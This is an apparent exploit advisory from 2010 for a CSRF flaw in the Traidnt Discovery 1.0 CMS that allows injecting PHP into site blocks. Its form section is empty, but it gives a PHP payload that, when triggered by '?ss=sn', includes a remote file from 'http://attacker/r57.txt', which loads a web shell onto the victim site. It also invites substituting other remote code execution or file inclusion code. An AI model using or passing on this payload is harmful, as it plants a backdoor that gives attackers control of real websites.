# Exploit Title: Traidnt Discovery - [CSRF] inject Blocks With PHP Codes # Date: 11-06-2010 # Author: G0D-F4Th3r # Software Link: http://discovery.traidnt.com/demo/ # Version: 1.0 # Tested on: http://discovery.traidnt.com/demo/ ====================================[form]================================================
==================================== After that open your code : http://site/[path]/index.php?ss=sn ==================================== Attention: You can change this { if($_GET['ss']=="sn"){ include('http://attacker/r57.txt'); } } to any code with Remote code execution or Local File Inclusion It depends to what you like :) ==================================== Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends